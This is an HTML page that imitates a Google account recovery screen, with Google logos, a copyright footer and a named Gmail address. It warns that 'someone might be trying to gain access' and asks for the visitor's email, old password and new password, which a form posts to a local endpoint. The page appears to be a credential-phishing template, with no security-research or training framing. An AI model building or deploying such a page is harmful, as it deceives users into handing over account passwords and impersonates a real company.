<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8">
    <title>Recover Your account</title><link rel="stylesheet" href="css/styles.css">
  </head>
  <body class="body2">
    <div class="drya">





  <div class="important">
    <img class="ryaim" src="imagesgmail/google1.png" alt="">
    <h3 class="h3recover"><img class="imagaccount" src="imagesgmail/googleimagep22.jpg" alt="">Christianogbonna247@gmail.com</h3>


    <!-- <h3 class="tc">To comfirm that this is you,enter your old password
    and create a new strong password. Someone might be trying to gain access to your account.
    <hr class="secondline"></h3> -->
    <div style="font-family:Roboto-Regular,Helvetica,Arial,sans-serif;font-size:14px;
    color:rgba(0,0,0,0.87);line-height:20px;padding-top:20px;text-align:center; padding-right:30%; width:80%;">
    <div class="notice">

      To comfirm that this is you,enter your old password
      and create a new strong password. Someone might be trying to gain access to your account.</div>

      <form class="formcheck" action="recover-your-account" method="post">
     
        <div class="oldpassword">
          <input  class="text-input" type="email" name="email" placeholder="Your email" required autofocus>
        </div>
        <div class="oldpassword">
          <input  class="text-input" type="password" name="oldPassword" placeholder="Old password" required autofocus>
        </div>
        <div class="newpassword">
          <input class="text-input" type="password" name="newPassword" placeholder="New password" required autofocus>
        </div>
        <!-- <div class="Comfirmpassword">
          <input class="text-input" type="password" name="conf-password" placeholder="Confirm password" required autofocus>
        </div> -->
        <!-- <button class="btn btn-lg btn-primary" style="padding: 1rem;" type="submit">Submit</button> -->

        <!-- <button class="submitbutton" type="submit" name="submit"><p class="submittext">Submit</p></button> -->
        <button class="submitbutton" type="submit"><p class="submittext">Submit</p></button>


    
    
      </form>

  </form>
  </div>
  <p class="alartreason">You received this email to let you know about important changes to your Google Account and services.
  © 2020 Google LLC, 1600 Amphitheatre Parkway, Mountain View, CA 94043, USA</p>
</div>

  </body>
</html>
